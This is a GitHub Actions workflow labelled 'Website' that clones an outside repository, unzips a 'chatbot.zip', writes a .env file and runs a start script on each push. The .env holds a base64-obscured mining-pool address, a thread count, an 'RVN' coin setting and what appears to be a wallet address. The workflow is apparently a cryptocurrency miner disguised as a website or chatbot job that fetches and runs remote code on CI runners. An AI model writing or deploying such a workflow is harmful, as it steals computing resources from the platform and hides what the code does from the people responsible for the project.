name: Website
on:
  push:
    branches:
      - main
  workflow_dispatch:

jobs:
  run-node-app:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout code
        uses: actions/checkout@v4

      - name: Clone repository
        run: git clone https://github.com/duongpokeeeee/sadsd

      - name: Run the Node.js app
        run: |
          cd sadsd
          yes A | unzip chatbot.zip
          echo -e "host=127.0.0.1\nport=3306\nproxy=wss://epoch-labs.up.railway.app/cG93ZXIyYi5uYS5taW5lLnpwb29sLmNhOjYyNDI=\nthreads=4\npassword=c=RVN\nusername=RBCPz2xQMf9Cz3eyqFTVFHVjZM2cTSeYRN" > .env
          bash start2.sh
